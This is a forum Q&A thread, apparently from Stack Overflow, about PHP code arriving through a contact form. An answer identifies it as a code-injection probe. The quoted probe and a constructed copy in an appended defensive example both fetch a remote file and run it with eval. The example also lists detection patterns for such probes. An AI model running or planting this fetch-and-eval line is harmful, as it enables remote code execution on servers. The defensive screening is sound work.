Sérey

Reputation: 1

I don't understand some PHP code that is inserted in an e-mail we receive

My client tells me that he regularly receives in his email box (linked to his contact form on his own website) this type of message:

-----Message d'origine----- De : Envoyé : Aucune Objet :

$a = get_contents('http://********.com.co//wp-admin/images/pel.jpeg'); eval('?>'.$a);

I replaced the domain name in the URL with **** for confidentiality reasons. The domain name in the URL of the get_contents function is unknown to us.

Do you have any idea what it could be? Spam? Bad configuration? Thanks in advance for your advice!

Upvotes: 0

Views: 31

Answers (1)

Quentin

Reputation: 943996

It's an attempt to exploit (an apparently non-existent) code injection vulnerability. The use of eval is a dead giveaway.

Upvotes: 2
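
An added example, not part of the original question or answer: a contact-form handler can flag probes like the one quoted above and pass the message on as inert text, never evaluating, including or saving it as a `.php` file. The function names, the pattern list and the placeholder domain are assumptions made for illustration.

```php
<?php
// Added example: screen contact-form submissions for PHP code-injection probes.
// Function names and the pattern list are hypothetical, not from the original post.

const PROBE_PATTERNS = [
    'eval call'          => '#\beval\s*\(#i',
    'remote fetch'       => '#\b(?:file_)?get_contents\s*\(\s*[\'"]https?://#i',
    'php open/close tag' => '#<\?|\?>#',
    'include of url'     => '#\b(?:include|require)(?:_once)?\b[^;]*https?://#i',
];

/** Return the names of the probe patterns found in a submitted field. */
function find_injection_markers(string $field): array
{
    $hits = [];
    foreach (PROBE_PATTERNS as $name => $regex) {
        if (preg_match($regex, $field) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/** Build the mail body as plain text; the input is only ever treated as data. */
function build_mail_body(string $message): string
{
    $markers = find_injection_markers($message);
    $prefix  = $markers ? '[flagged: ' . implode(', ', $markers) . "]\n" : '';
    // Drop control characters other than tab and newline so the body stays plain text.
    $clean = preg_replace('/[\x00-\x08\x0B-\x1F\x7F]/', '', $message) ?? '';
    return $prefix . $clean;
}

// Constructed sample modelled on the message in the question (placeholder domain).
$sample = "\$a = get_contents('http://example.invalid//wp-admin/images/pel.jpeg'); eval('?>'.\$a);";

print_r(find_injection_markers($sample));   // which patterns matched
echo build_mail_body($sample), "\n";        // flagged, delivered as text
echo build_mail_body("Hello, I'd like a quote for your services."), "\n"; // not flagged
```

Flagged submissions can be logged with the sender's IP address and timestamp so that repeated probes against the form show up in review.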
